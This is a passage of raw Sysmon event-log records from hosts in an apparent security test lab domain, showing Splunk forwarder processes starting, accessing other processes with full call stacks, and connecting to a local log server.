Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000978954Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:27.561{69CF5F33-8AFB-6151-CA79-00000000FD01}996C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000978953Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:24.765{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59392-false10.0.1.12-8000- 10341000x8000000000000000978952Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:27.060{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8AFB-6151-C979-00000000FD01}3588C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978951Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:27.060{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978950Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:27.060{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978949Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:27.060{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978948Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:27.060{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978947Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:27.060{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978946Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:27.060{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978945Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:27.060{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978944Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:27.060{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978943Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:27.060{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978942Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:27.060{69CF5F33-7F27-614D-0500-00000000FD01}408524C:\Windows\system32\csrss.exe{69CF5F33-8AFB-6151-C979-00000000FD01}3588C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000978941Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:27.060{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8AFB-6151-C979-00000000FD01}3588C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000978940Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:27.045{69CF5F33-8AFB-6151-C979-00000000FD01}3588C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001050294Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:28.407{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E53F2F155BE50C6B649C02FAF7C6FFC1,SHA256=922051AA3C1218CF650C56E480C9E5EB3BB915F62BCBF41C7140229AF596A2F2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000978995Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:28.951{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8AFC-6151-CC79-00000000FD01}1064C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978994Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:28.951{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978993Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:28.951{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978992Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:28.951{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978991Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:28.951{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978990Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:28.951{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978989Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:28.951{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978988Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:28.951{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978987Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:28.951{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978986Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:28.951{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978985Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:28.951{69CF5F33-7F27-614D-0500-00000000FD01}408980C:\Windows\system32\csrss.exe{69CF5F33-8AFC-6151-CC79-00000000FD01}1064C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000978984Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:28.951{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8AFC-6151-CC79-00000000FD01}1064C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program 